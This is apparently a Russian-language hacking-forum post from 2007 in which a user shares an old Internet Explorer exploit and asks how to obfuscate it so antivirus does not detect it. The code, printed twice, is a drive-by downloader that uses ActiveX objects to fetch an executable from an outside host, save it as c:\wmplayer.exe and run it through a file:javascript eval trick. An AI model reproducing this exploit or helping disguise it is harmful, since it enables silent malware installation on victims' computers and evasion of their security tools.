baz1k
07.02.2007, 23:45
Привет, ребят! Есть такой старенький сплойт под IE, вот его код:
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://bazik.km.ru/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("c:\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function Zqqw(code){
result='';
lines=code.split(/\r\n/);
for(i=0;i<lines.length;i++){
line=lines[i];
line=line.replace(/^\s+/,"");
line=line.replace(/\s+$/,"");
line=line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = Zqqw(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("c:\\wmplayer.exe","_media");
setTimeout("doit()", 5000);
</script>
Конечно же он палится любым антивирусом! Есть способы шифрования и чего то еще, главное что б работало и не палилось..?
Если идей нет подскажите что-то похожее по принципу действия, ну кроме WMF..?
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://bazik.km.ru/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("c:\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function Zqqw(code){
result='';
lines=code.split(/\r\n/);
for(i=0;i<lines.length;i++){
line=lines[i];
line=line.replace(/^\s+/,"");
line=line.replace(/\s+$/,"");
line=line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = Zqqw(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("c:\\wmplayer.exe","_media");
setTimeout("doit()", 5000);
</script>
Конечно же он палится любым антивирусом! Есть способы шифрования и чего то еще, главное что б работало и не палилось..?
Если идей нет подскажите что-то похожее по принципу действия, ну кроме WMF..?